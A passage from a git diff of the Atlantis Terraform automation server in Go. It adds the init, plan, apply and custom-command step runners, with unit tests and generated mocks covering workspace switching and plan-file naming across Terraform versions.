+ ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err)
+}
+
+func TestRun_NoPlanFile(t *testing.T) {
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+ o := runtime.ApplyStepRunner{
+ TerraformExecutor: nil,
+ }
+ _, err := o.Run(models.ProjectCommandContext{
+ RepoRelDir: ".",
+ Workspace: "workspace",
+ }, nil, tmpDir)
+ ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err)
+}
+
+func TestRun_Success(t *testing.T) {
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+ planPath := filepath.Join(tmpDir, "workspace.tfplan")
+ err := ioutil.WriteFile(planPath, nil, 0644)
+ Ok(t, err)
+
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+ o := runtime.ApplyStepRunner{
+ TerraformExecutor: terraform,
+ }
+
+ When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+ ThenReturn("output", nil)
+ output, err := o.Run(models.ProjectCommandContext{
+ Workspace: "workspace",
+ RepoRelDir: ".",
+ CommentArgs: []string{"comment", "args"},
+ }, []string{"extra", "args"}, tmpDir)
+ Ok(t, err)
+ Equals(t, "output", output)
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, nil, "workspace")
+}
+
+func TestRun_AppliesCorrectProjectPlan(t *testing.T) {
+ // When running for a project, the planfile has a different name.
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+ planPath := filepath.Join(tmpDir, "projectname-default.tfplan")
+ err := ioutil.WriteFile(planPath, nil, 0644)
+ Ok(t, err)
+
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+ o := runtime.ApplyStepRunner{
+ TerraformExecutor: terraform,
+ }
+
+ When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+ ThenReturn("output", nil)
+ projectName := "projectname"
+ output, err := o.Run(models.ProjectCommandContext{
+ Workspace: "default",
+ RepoRelDir: ".",
+ ProjectConfig: &valid.Project{
+ Name: &projectName,
+ },
+ CommentArgs: []string{"comment", "args"},
+ }, []string{"extra", "args"}, tmpDir)
+ Ok(t, err)
+ Equals(t, "output", output)
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, nil, "default")
+}
+
+func TestRun_UsesConfiguredTFVersion(t *testing.T) {
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+ planPath := filepath.Join(tmpDir, "workspace.tfplan")
+ err := ioutil.WriteFile(planPath, nil, 0644)
+ Ok(t, err)
+
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+ o := runtime.ApplyStepRunner{
+ TerraformExecutor: terraform,
+ }
+ tfVersion, _ := version.NewVersion("0.11.0")
+
+ When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+ ThenReturn("output", nil)
+ output, err := o.Run(models.ProjectCommandContext{
+ Workspace: "workspace",
+ RepoRelDir: ".",
+ CommentArgs: []string{"comment", "args"},
+ ProjectConfig: &valid.Project{
+ TerraformVersion: tfVersion,
+ },
+ }, []string{"extra", "args"}, tmpDir)
+ Ok(t, err)
+ Equals(t, "output", output)
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, tfVersion, "workspace")
+}
diff --git a/server/events/runtime/init_step_runner.go b/server/events/runtime/init_step_runner.go
new file mode 100644
index 0000000000..da8ae585ff
--- /dev/null
+++ b/server/events/runtime/init_step_runner.go
@@ -0,0 +1,30 @@
+package runtime
+
+import (
+ "github.com/hashicorp/go-version"
+ "github.com/runatlantis/atlantis/server/events/models"
+)
+
+// InitStep runs `terraform init`.
+type InitStepRunner struct {
+ TerraformExecutor TerraformExec
+ DefaultTFVersion *version.Version
+}
+
+// nolint: unparam
+func (i *InitStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+ tfVersion := i.DefaultTFVersion
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
+ tfVersion = ctx.ProjectConfig.TerraformVersion
+ }
+ // If we're running < 0.9 we have to use `terraform get` instead of `init`.
+ if MustConstraint("< 0.9.0").Check(tfVersion) {
+ ctx.Log.Info("running terraform version %s so will use `get` instead of `init`", tfVersion)
+ terraformGetCmd := append([]string{"get", "-no-color"}, extraArgs...)
+ _, err := i.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, terraformGetCmd, tfVersion, ctx.Workspace)
+ return "", err
+ } else {
+ _, err := i.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, append([]string{"init", "-no-color"}, extraArgs...), tfVersion, ctx.Workspace)
+ return "", err
+ }
+}
diff --git a/server/events/runtime/init_step_runner_test.go b/server/events/runtime/init_step_runner_test.go
new file mode 100644
index 0000000000..ff0ec9f084
--- /dev/null
+++ b/server/events/runtime/init_step_runner_test.go
@@ -0,0 +1,66 @@
+package runtime_test
+
+import (
+ "testing"
+
+ version "github.com/hashicorp/go-version"
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server/events/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/runtime"
+ "github.com/runatlantis/atlantis/server/events/terraform/mocks"
+ matchers2 "github.com/runatlantis/atlantis/server/events/terraform/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/logging"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRun_UsesGetOrInitForRightVersion(t *testing.T) {
+ RegisterMockTestingT(t)
+ cases := []struct {
+ version string
+ expCmd string
+ }{
+ {
+ "0.8.9",
+ "get",
+ },
+ {
+ "0.9.0",
+ "init",
+ },
+ {
+ "0.9.1",
+ "init",
+ },
+ {
+ "0.10.0",
+ "init",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.version, func(t *testing.T) {
+ terraform := mocks.NewMockClient()
+
+ tfVersion, _ := version.NewVersion(c.version)
+ logger := logging.NewNoopLogger()
+ iso := runtime.InitStepRunner{
+ TerraformExecutor: terraform,
+ DefaultTFVersion: tfVersion,
+ }
+ When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+ ThenReturn("output", nil)
+
+ output, err := iso.Run(models.ProjectCommandContext{
+ Log: logger,
+ Workspace: "workspace",
+ RepoRelDir: ".",
+ }, []string{"extra", "args"}, "/path")
+ Ok(t, err)
+ // Shouldn't return output since we don't print init output to PR.
+ Equals(t, "", output)
+
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{c.expCmd, "-no-color", "extra", "args"}, tfVersion, "workspace")
+ })
+ }
+}
diff --git a/server/events/runtime/mocks/matchers/models_pullrequest.go b/server/events/runtime/mocks/matchers/models_pullrequest.go
new file mode 100644
index 0000000000..d8b146baa4
--- /dev/null
+++ b/server/events/runtime/mocks/matchers/models_pullrequest.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnyModelsPullRequest() models.PullRequest {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(models.PullRequest))(nil)).Elem()))
+ var nullValue models.PullRequest
+ return nullValue
+}
+
+func EqModelsPullRequest(value models.PullRequest) models.PullRequest {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue models.PullRequest
+ return nullValue
+}
diff --git a/server/events/runtime/mocks/matchers/models_repo.go b/server/events/runtime/mocks/matchers/models_repo.go
new file mode 100644
index 0000000000..3f8e699ebe
--- /dev/null
+++ b/server/events/runtime/mocks/matchers/models_repo.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnyModelsRepo() models.Repo {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(models.Repo))(nil)).Elem()))
+ var nullValue models.Repo
+ return nullValue
+}
+
+func EqModelsRepo(value models.Repo) models.Repo {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue models.Repo
+ return nullValue
+}
diff --git a/server/events/runtime/mocks/mock_pull_approved_checker.go b/server/events/runtime/mocks/mock_pull_approved_checker.go
new file mode 100644
index 0000000000..69f1e4a502
--- /dev/null
+++ b/server/events/runtime/mocks/mock_pull_approved_checker.go
@@ -0,0 +1,84 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events/runtime (interfaces: PullApprovedChecker)
+
+package mocks
+
+import (
+ "reflect"
+
+ pegomock "github.com/petergtz/pegomock"
+ models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+type MockPullApprovedChecker struct {
+ fail func(message string, callerSkip ...int)
+}
+
+func NewMockPullApprovedChecker() *MockPullApprovedChecker {
+ return &MockPullApprovedChecker{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockPullApprovedChecker) PullIsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) {
+ params := []pegomock.Param{baseRepo, pull}
+ result := pegomock.GetGenericMockFrom(mock).Invoke("PullIsApproved", params, []reflect.Type{reflect.TypeOf((*bool)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+ var ret0 bool
+ var ret1 error
+ if len(result) != 0 {
+ if result[0] != nil {
+ ret0 = result[0].(bool)
+ }
+ if result[1] != nil {
+ ret1 = result[1].(error)
+ }
+ }
+ return ret0, ret1
+}
+
+func (mock *MockPullApprovedChecker) VerifyWasCalledOnce() *VerifierPullApprovedChecker {
+ return &VerifierPullApprovedChecker{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockPullApprovedChecker) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierPullApprovedChecker {
+ return &VerifierPullApprovedChecker{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockPullApprovedChecker) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierPullApprovedChecker {
+ return &VerifierPullApprovedChecker{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierPullApprovedChecker struct {
+ mock *MockPullApprovedChecker
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierPullApprovedChecker) PullIsApproved(baseRepo models.Repo, pull models.PullRequest) *PullApprovedChecker_PullIsApproved_OngoingVerification {
+ params := []pegomock.Param{baseRepo, pull}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "PullIsApproved", params)
+ return &PullApprovedChecker_PullIsApproved_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type PullApprovedChecker_PullIsApproved_OngoingVerification struct {
+ mock *MockPullApprovedChecker
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *PullApprovedChecker_PullIsApproved_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest) {
+ baseRepo, pull := c.GetAllCapturedArguments()
+ return baseRepo[len(baseRepo)-1], pull[len(pull)-1]
+}
+
+func (c *PullApprovedChecker_PullIsApproved_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.Repo, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.Repo)
+ }
+ _param1 = make([]models.PullRequest, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(models.PullRequest)
+ }
+ }
+ return
+}
diff --git a/server/events/runtime/plan_step_runner.go b/server/events/runtime/plan_step_runner.go
new file mode 100644
index 0000000000..00fe94df73
--- /dev/null
+++ b/server/events/runtime/plan_step_runner.go
@@ -0,0 +1,104 @@
+package runtime
+
+import (
+ "fmt"
+ "os"
+ "path/filepath"
+ "strings"
+
+ "github.com/hashicorp/go-version"
+ "github.com/runatlantis/atlantis/server/events/models"
+)
+
+// atlantisUserTFVar is the name of the variable we execute terraform
+// with, containing the vcs username of who is running the command
+const atlantisUserTFVar = "atlantis_user"
+const defaultWorkspace = "default"
+
+type PlanStepRunner struct {
+ TerraformExecutor TerraformExec
+ DefaultTFVersion *version.Version
+}
+
+func (p *PlanStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+ tfVersion := p.DefaultTFVersion
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
+ tfVersion = ctx.ProjectConfig.TerraformVersion
+ }
+
+ // We only need to switch workspaces in version 0.9.*. In older versions,
+ // there is no such thing as a workspace so we don't need to do anything.
+ if err := p.switchWorkspace(ctx, path, tfVersion); err != nil {
+ return "", err
+ }
+
+ // todo: move this to a common library
+ planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace)
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.Name != nil {
+ planFileName = fmt.Sprintf("%s-%s", *ctx.ProjectConfig.Name, planFileName)
+ }
+ planFile := filepath.Join(path, planFileName)
+ userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, ctx.User.Username)
+ tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, extraArgs...), ctx.CommentArgs...)
+
+ // Check if env/{workspace}.tfvars exist and include it. This is a use-case
+ // from Hootsuite where Atlantis was first created so we're keeping this as
+ // an homage and a favor so they don't need to refactor all their repos.
+ // It's also a nice way to structure your repos to reduce duplication.
+ optionalEnvFile := filepath.Join(path, "env", ctx.Workspace+".tfvars")
+ if _, err := os.Stat(optionalEnvFile); err == nil {
+ tfPlanCmd = append(tfPlanCmd, "-var-file", optionalEnvFile)
+ }
+
+ return p.TerraformExecutor.RunCommandWithVersion(ctx.Log, filepath.Join(path), tfPlanCmd, tfVersion, ctx.Workspace)
+}
+
+// switchWorkspace changes the terraform workspace if necessary and will create
+// it if it doesn't exist. It handles differences between versions.
+func (p *PlanStepRunner) switchWorkspace(ctx models.ProjectCommandContext, path string, tfVersion *version.Version) error {
+ // In versions less than 0.9 there is no support for workspaces.
+ noWorkspaceSupport := MustConstraint("<0.9").Check(tfVersion)
+ // If the user tried to set a specific workspace in the comment but their
+ // version of TF doesn't support workspaces then error out.
+ if noWorkspaceSupport && ctx.Workspace != defaultWorkspace {
+ return fmt.Errorf("terraform version %s does not support workspaces", tfVersion)
+ }
+ if noWorkspaceSupport {
+ return nil
+ }
+
+ // In version 0.9.* the workspace command was called env.
+ workspaceCmd := "workspace"
+ runningZeroPointNine := MustConstraint(">=0.9,<0.10").Check(tfVersion)
+ if runningZeroPointNine {
+ workspaceCmd = "env"
+ }
+
+ // Use `workspace show` to find out what workspace we're in now. If we're
+ // already in the right workspace then no need to switch. This will save us
+ // about ten seconds. This command is only available in > 0.10.
+ if !runningZeroPointNine {
+ workspaceShowOutput, err := p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "show"}, tfVersion, ctx.Workspace)
+ if err != nil {
+ return err
+ }
+ // If `show` says we're already on this workspace then we're done.
+ if strings.TrimSpace(workspaceShowOutput) == ctx.Workspace {
+ return nil
+ }
+ }
+
+ // Finally we'll have to select the workspace. We need to figure out if this
+ // workspace exists so we can create it if it doesn't.
+ // To do this we can either select and catch the error or use list and then
+ // look for the workspace. Both commands take the same amount of time so
+ // that's why we're running select here.
+ _, err := p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "select", "-no-color", ctx.Workspace}, tfVersion, ctx.Workspace)
+ if err != nil {
+ // If terraform workspace select fails we run terraform workspace
+ // new to create a new workspace automatically.
+ _, err = p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "new", "-no-color", ctx.Workspace}, tfVersion, ctx.Workspace)
+ return err
+ }
+ return nil
+}
diff --git a/server/events/runtime/plan_step_runner_test.go b/server/events/runtime/plan_step_runner_test.go
new file mode 100644
index 0000000000..ed10a5090e
--- /dev/null
+++ b/server/events/runtime/plan_step_runner_test.go
@@ -0,0 +1,299 @@
+package runtime_test
+
+import (
+ "io/ioutil"
+ "os"
+ "path/filepath"
+ "testing"
+
+ "github.com/hashicorp/go-version"
+ . "github.com/petergtz/pegomock"
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/runtime"
+ "github.com/runatlantis/atlantis/server/events/terraform/mocks"
+ matchers2 "github.com/runatlantis/atlantis/server/events/terraform/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "github.com/runatlantis/atlantis/server/logging"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRun_NoWorkspaceIn08(t *testing.T) {
+ // We don't want any workspace commands to be run in 0.8.
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+
+ tfVersion, _ := version.NewVersion("0.8")
+ logger := logging.NewNoopLogger()
+ workspace := "default"
+ s := runtime.PlanStepRunner{
+ DefaultTFVersion: tfVersion,
+ TerraformExecutor: terraform,
+ }
+
+ When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+ ThenReturn("output", nil)
+ output, err := s.Run(models.ProjectCommandContext{
+ Log: logger,
+ CommentArgs: []string{"comment", "args"},
+ Workspace: workspace,
+ RepoRelDir: ".",
+ User: models.User{Username: "username"},
+ }, []string{"extra", "args"}, "/path")
+ Ok(t, err)
+
+ Equals(t, "output", output)
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{"plan", "-refresh", "-no-color", "-out", "/path/default.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}, tfVersion, workspace)
+
+ // Verify that no env or workspace commands were run
+ terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"env", "select", "-no-color", "workspace"}, tfVersion, workspace)
+ terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"workspace", "select", "-no-color", "workspace"}, tfVersion, workspace)
+}
+
+func TestRun_ErrWorkspaceIn08(t *testing.T) {
+ // If they attempt to use a workspace other than default in 0.8
+ // we should error.
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+
+ tfVersion, _ := version.NewVersion("0.8")
+ logger := logging.NewNoopLogger()
+ workspace := "notdefault"
+ s := runtime.PlanStepRunner{
+ TerraformExecutor: terraform,
+ DefaultTFVersion: tfVersion,
+ }
+
+ When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+ ThenReturn("output", nil)
+ _, err := s.Run(models.ProjectCommandContext{
+ Log: logger,
+ Workspace: workspace,
+ RepoRelDir: ".",
+ User: models.User{Username: "username"},
+ }, []string{"extra", "args"}, "/path")
+ ErrEquals(t, "terraform version 0.8.0 does not support workspaces", err)
+}
+
+func TestRun_SwitchesWorkspace(t *testing.T) {
+ RegisterMockTestingT(t)
+
+ cases := []struct {
+ tfVersion string
+ expWorkspaceCmd string
+ }{
+ {
+ "0.9.0",
+ "env",
+ },
+ {
+ "0.9.11",
+ "env",
+ },
+ {
+ "0.10.0",
+ "workspace",
+ },
+ {
+ "0.11.0",
+ "workspace",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.tfVersion, func(t *testing.T) {
+ terraform := mocks.NewMockClient()
+
+ tfVersion, _ := version.NewVersion(c.tfVersion)
+ logger := logging.NewNoopLogger()
+
+ s := runtime.PlanStepRunner{
+ TerraformExecutor: terraform,
+ DefaultTFVersion: tfVersion,
+ }
+
+ When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+ ThenReturn("output", nil)
+ output, err := s.Run(models.ProjectCommandContext{
+ Log: logger,
+ Workspace: "workspace",
+ RepoRelDir: ".",
+ User: models.User{Username: "username"},
+ CommentArgs: []string{"comment", "args"},
+ }, []string{"extra", "args"}, "/path")
+ Ok(t, err)
+
+ Equals(t, "output", output)
+ // Verify that env select was called as well as plan.
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{c.expWorkspaceCmd, "select", "-no-color", "workspace"}, tfVersion, "workspace")
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}, tfVersion, "workspace")
+ })
+ }
+}
+
+func TestRun_CreatesWorkspace(t *testing.T) {
+ // Test that if `workspace select` fails, we call `workspace new`.
+ RegisterMockTestingT(t)
+
+ cases := []struct {
+ tfVersion string
+ expWorkspaceCommand string
+ }{
+ {
+ "0.9.0",
+ "env",
+ },
+ {
+ "0.9.11",
+ "env",
+ },
+ {
+ "0.10.0",
+ "workspace",
+ },
+ {
+ "0.11.0",
+ "workspace",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.tfVersion, func(t *testing.T) {
+ terraform := mocks.NewMockClient()
+ tfVersion, _ := version.NewVersion(c.tfVersion)
+ logger := logging.NewNoopLogger()
+ s := runtime.PlanStepRunner{
+ TerraformExecutor: terraform,
+ DefaultTFVersion: tfVersion,
+ }
+
+ // Ensure that we actually try to switch workspaces by making the
+ // output of `workspace show` to be a different name.
+ When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("diffworkspace\n", nil)
+
+ expWorkspaceArgs := []string{c.expWorkspaceCommand, "select", "-no-color", "workspace"}
+ When(terraform.RunCommandWithVersion(logger, "/path", expWorkspaceArgs, tfVersion, "workspace")).ThenReturn("", errors.New("workspace does not exist"))
+
+ expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}
+ When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil)
+
+ output, err := s.Run(models.ProjectCommandContext{
+ Log: logger,
+ Workspace: "workspace",
+ RepoRelDir: ".",
+ User: models.User{Username: "username"},
+ CommentArgs: []string{"comment", "args"},
+ }, []string{"extra", "args"}, "/path")
+ Ok(t, err)
+
+ Equals(t, "output", output)
+ // Verify that env select was called as well as plan.
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expWorkspaceArgs, tfVersion, "workspace")
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")
+ })
+ }
+}
+
+func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) {
+ // Tests that if workspace show says we're on the right workspace we don't
+ // switch.
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+ tfVersion, _ := version.NewVersion("0.10.0")
+ logger := logging.NewNoopLogger()
+ s := runtime.PlanStepRunner{
+ TerraformExecutor: terraform,
+ DefaultTFVersion: tfVersion,
+ }
+ When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil)
+
+ expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}
+ When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil)
+
+ output, err := s.Run(models.ProjectCommandContext{
+ Log: logger,
+ Workspace: "workspace",
+ RepoRelDir: ".",
+ User: models.User{Username: "username"},
+ CommentArgs: []string{"comment", "args"},
+ }, []string{"extra", "args"}, "/path")
+ Ok(t, err)
+
+ Equals(t, "output", output)
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")
+
+ // Verify that workspace select was never called.
+ terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"workspace", "select", "-no-color", "workspace"}, tfVersion, "workspace")
+}
+
+func TestRun_AddsEnvVarFile(t *testing.T) {
+ // Test that if env/workspace.tfvars file exists we use -var-file option.
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+
+ // Create the env/workspace.tfvars file.
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+ err := os.MkdirAll(filepath.Join(tmpDir, "env"), 0700)
+ Ok(t, err)
+ envVarsFile := filepath.Join(tmpDir, "env/workspace.tfvars")
+ err = ioutil.WriteFile(envVarsFile, nil, 0644)
+ Ok(t, err)
+
+ // Using version >= 0.10 here so we don't expect any env commands.
+ tfVersion, _ := version.NewVersion("0.10.0")
+ logger := logging.NewNoopLogger()
+ s := runtime.PlanStepRunner{
+ TerraformExecutor: terraform,
+ DefaultTFVersion: tfVersion,
+ }
+
+ expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", filepath.Join(tmpDir, "workspace.tfplan"), "-var", "atlantis_user=username", "extra", "args", "comment", "args", "-var-file", envVarsFile}
+ When(terraform.RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil)
+
+ output, err := s.Run(models.ProjectCommandContext{
+ Log: logger,
+ Workspace: "workspace",
+ RepoRelDir: ".",
+ User: models.User{Username: "username"},
+ CommentArgs: []string{"comment", "args"},
+ }, []string{"extra", "args"}, tmpDir)
+ Ok(t, err)
+
+ // Verify that env select was never called since we're in version >= 0.10
+ terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, tmpDir, []string{"env", "select", "-no-color", "workspace"}, tfVersion, "workspace")
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace")
+ Equals(t, "output", output)
+}
+
+func TestRun_UsesDiffPathForProject(t *testing.T) {
+ // Test that if running for a project, uses a different path for the plan
+ // file.
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+ tfVersion, _ := version.NewVersion("0.10.0")
+ logger := logging.NewNoopLogger()
+ s := runtime.PlanStepRunner{
+ TerraformExecutor: terraform,
+ DefaultTFVersion: tfVersion,
+ }
+ When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil)
+
+ expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/projectname-default.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}
+ When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "default")).ThenReturn("output", nil)
+
+ projectName := "projectname"
+ output, err := s.Run(models.ProjectCommandContext{
+ Log: logger,
+ Workspace: "default",
+ RepoRelDir: ".",
+ User: models.User{Username: "username"},
+ CommentArgs: []string{"comment", "args"},
+ ProjectConfig: &valid.Project{
+ Name: &projectName,
+ },
+ }, []string{"extra", "args"}, "/path")
+ Ok(t, err)
+ Equals(t, "output", output)
+}
diff --git a/server/events/runtime/pull_approved_checker.go b/server/events/runtime/pull_approved_checker.go
new file mode 100644
index 0000000000..e77aa2acb1
--- /dev/null
+++ b/server/events/runtime/pull_approved_checker.go
@@ -0,0 +1,11 @@
+package runtime
+
+import (
+ "github.com/runatlantis/atlantis/server/events/models"
+)
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_pull_approved_checker.go PullApprovedChecker
+
+type PullApprovedChecker interface {
+ PullIsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error)
+}
diff --git a/server/events/runtime/run_step_runner.go b/server/events/runtime/run_step_runner.go
new file mode 100644
index 0000000000..0bdb7d802b
--- /dev/null
+++ b/server/events/runtime/run_step_runner.go
@@ -0,0 +1,48 @@
+package runtime
+
+import (
+ "fmt"
+ "os"
+ "os/exec"
+ "strings"
+
+ "github.com/hashicorp/go-version"
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/models"
+)
+
+// RunStepRunner runs custom commands.
+type RunStepRunner struct {
+ DefaultTFVersion *version.Version
+}
+
+func (r *RunStepRunner) Run(ctx models.ProjectCommandContext, command []string, path string) (string, error) {
+ if len(command) < 1 {
+ return "", errors.New("no commands for run step")
+ }
+
+ cmd := exec.Command("sh", "-c", strings.Join(command, " ")) // #nosec
+ cmd.Dir = path
+ tfVersion := r.DefaultTFVersion.String()
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
+ tfVersion = ctx.ProjectConfig.TerraformVersion.String()
+ }
+ baseEnvVars := os.Environ()
+ customEnvVars := []string{
+ fmt.Sprintf("WORKSPACE=%s", ctx.Workspace),
+ fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", tfVersion),
+ fmt.Sprintf("DIR=%s", path),
+ }
+ finalEnvVars := append(baseEnvVars, customEnvVars...)
+ cmd.Env = finalEnvVars
